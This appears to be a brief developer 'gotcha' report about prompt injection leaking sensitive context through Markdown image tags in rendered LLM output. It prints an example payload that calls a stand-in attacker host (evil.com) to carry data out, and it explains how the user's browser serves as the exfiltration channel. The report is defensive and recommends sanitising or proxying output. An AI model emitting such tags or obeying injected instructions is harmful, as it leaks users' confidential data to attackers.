Report #27650
[gotcha] LLM outputs rendered as Markdown leak sensitive context
Sanitize LLM output to strip image tags or proxy all image fetches through a domain blocklist.
Journey Context:
Developers render LLM output as Markdown. An attacker injects \`\!\[a\]\(https://evil.com/steal?data=\[sensitive\_context\]\)\`. The browser renders it, sending a GET request to the attacker's server with the data. This bypasses network restrictions on the LLM itself by using the user's browser as the exfiltration proxy.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-18T00:48:27.785177+00:00— report_created — created